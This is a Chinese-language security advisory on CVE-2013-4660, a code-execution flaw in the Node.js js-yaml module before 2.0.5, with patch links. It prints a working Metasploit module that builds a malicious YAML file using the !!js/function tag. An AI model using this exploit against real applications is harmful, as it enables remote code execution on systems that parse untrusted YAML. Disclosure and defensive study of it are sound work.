发布日期:2013-07-01
更新日期:2013-10-14受影响系统:
js-yaml js-yaml 2.0.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 60867
CVE(CAN) ID: CVE-2013-4660js-yaml是YAML 1.2的JavaScript解析器和串联器。Node.js的js-yaml模块2.0.5之前版本在解析输入时,没有考虑不安全的!!js/function旗标,可使远程攻击者通过特制的字符串触发eval操作,执行任意代码。<*来源:Neal Poole
链接:http://www.osvdb.org/94656
http://www.rapid7.com/db/modules/exploit/multi/fileformat/nodejs_js_yaml_load_code_exec
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!require "msf/core"class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info = {})
super(update_info(info,
"Name" => "Nodejs js-yaml load() Code Exec",
"Description" => %q{
For node.js applications that parse user-supplied YAML input
using the
load() function from the "js-yaml" package < 2.0.5, specifying a
self-executing
function allows us to execute arbitrary javascript code.
},
"Author" => ["joev <jvennix[at]rapid7.com>"],
"License" => MSF_LICENSE,
"References" =>
[
["CVE", "2013-4660"],
["URL",
"https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/"]
],
"Platform" => "nodejs",
"Arch" => ARCH_NODEJS,
"Privileged" => false,
"Targets" => [["Automatic", {}]],
"DisclosureDate" => "Jun 28 2013",
"DefaultTarget" => 0)) register_options([
OptString.new("FILENAME", [ true, "The file name.", "msf.yml"])
], self.class)
end def exploit
p = payload.encoded
print_status("Creating "#{datastore["FILENAME"]}" file...")
file_create("a: !!js/function >
(function(){ #{p} })();")
end
end建议:
--------------------------------------------------------------------------------
厂商补丁:js-yaml
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:https://github.com/nodeca/js-yaml
http://portal.nodesecurity.io/advisories/js-yaml
推荐阅读:Node.Js入门[PDF+相关代码] http://www.linuxidc.com/Linux/2013-06/85462.htmNode.js安装与配置 http://www.linuxidc.com/Linux/2013-05/84836.htm
Node.js 的详细介绍:请点这里
Node.js 的下载地址:请点这里X.Org Xserver “doImageText()” 释放后重利用漏洞逆向工程友讯科技 (D-Link) 路由器固件后门相关资讯 Node.js js-yaml
- Node.js v6.8.1 发布下载 (今 10:26)
- Node.js HTTP Web 服务器代码 (09月26日)
- Ubuntu 16.04 64位 搭建 Node.js (09月25日)
| - Node.js v7 Beta版引入citgm (09月30日)
- 基于Docker部署Node.js应用环境 (09月26日)
- Node.js v4.4.5发布下载 (05月25日)
|
本文评论 查看全部评论 (0)